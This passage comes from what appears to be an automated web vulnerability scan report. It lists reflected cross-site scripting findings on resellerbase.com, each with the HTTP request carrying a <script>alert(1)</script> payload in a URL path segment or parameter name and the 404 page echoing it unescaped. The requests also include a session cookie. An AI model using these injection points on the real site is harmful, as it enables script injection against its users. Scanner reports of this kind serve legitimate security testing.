User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2662. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51457<script>alert(1)</script>2fdab892aa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes51457<script>alert(1)</script>2fdab892aa0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes51457<script>alert(1)</script>2fdab892aa0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2663. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7625a<script>alert(1)</script>27e08d48dcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos7625a<script>alert(1)</script>27e08d48dcf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos7625a<script>alert(1)</script>27e08d48dcf/ was not found on this server.</p>
...[SNIP]...

2.2664. http://www.resellerbase.com/detail/39/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eb6f4<script>alert(1)</script>9a3a57da5c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/?eb6f4<script>alert(1)</script>9a3a57da5c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/?eb6f4<script>alert(1)</script>9a3a57da5c2=1 was not found on this server.</p>
...[SNIP]...

2.2665. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90046<script>alert(1)</script>0eba9ee2647 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail90046<script>alert(1)</script>0eba9ee2647/39/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail90046<script>alert(1)</script>0eba9ee2647/39/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2666. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c83af<script>alert(1)</script>85904773b45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39c83af<script>alert(1)</script>85904773b45/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39c83af<script>alert(1)</script>85904773b45/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2667. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4aaa4<script>alert(1)</script>4abfb112643 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes4aaa4<script>alert(1)</script>4abfb112643/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes4aaa4<script>alert(1)</script>4abfb112643/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2668. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e2d5<script>alert(1)</script>867731f10ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos5e2d5<script>alert(1)</script>867731f10ff/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2669. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c260f<script>alert(1)</script>9864e37adfe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesc260f<script>alert(1)</script>9864e37adfe/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesc260f<script>alert(1)</script>9864e37adfe/ was not found on this server.</p>
...[SNIP]...

2.2670. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59bf5<script>alert(1)</script>f8fd8a99893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/?59bf5<script>alert(1)</script>f8fd8a99893=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/?59bf5<script>alert(1)</script>f8fd8a99893=1 was not found on this server.</p>
...[SNIP]...

2.2671. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5e88<script>alert(1)</script>bdc36ad4ba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild5e88<script>alert(1)</script>bdc36ad4ba8/39/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild5e88<script>alert(1)</script>bdc36ad4ba8/39/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2672. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 107ce<script>alert(1)</script>cd0966088a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39107ce<script>alert(1)</script>cd0966088a2/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39107ce<script>alert(1)</script>cd0966088a2/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2673. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60af6<script>alert(1)</script>863819d30b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes60af6<script>alert(1)</script>863819d30b5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes60af6<script>alert(1)</script>863819d30b5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2674. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de225<script>alert(1)</script>d377dfa2728 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosde225<script>alert(1)</script>d377dfa2728/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosde225<script>alert(1)</script>d377dfa2728/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2675. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8f966<script>alert(1)</script>5353b499e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images8f966<script>alert(1)</script>5353b499e4/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images8f966<script>alert(1)</script>5353b499e4/rating/ was not found on this server.</p>
...[SNIP]...

2.2676. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bd968<script>alert(1)</script>2435d117f61 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratingbd968<script>alert(1)</script>2435d117f61/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratingbd968<script>alert(1)</script>2435d117f61/ was not found on this server.</p>
...[SNIP]...

2.2677. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1b376<script>alert(1)</script>7d2dca9b54a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/?1b376<script>alert(1)</script>7d2dca9b54a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/?1b376<script>alert(1)</script>7d2dca9b54a=1 was not found on this server.</p>
...[SNIP]...

2.2678. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dac15<script>alert(1)</script>7295d65a751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildac15<script>alert(1)</script>7295d65a751/39/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildac15<script>alert(1)</script>7295d65a751/39/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2679. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92d14<script>alert(1)</script>e043cf1767d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3992d14<script>alert(1)</script>e043cf1767d/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3992d14<script>alert(1)</script>e043cf1767d/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2680. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2885e<script>alert(1)</script>5771e30e237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes2885e<script>alert(1)</script>5771e30e237/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes2885e<script>alert(1)</script>5771e30e237/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2681. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccc88<script>alert(1)</script>f80bb03a5a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosccc88<script>alert(1)</script>f80bb03a5a7/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
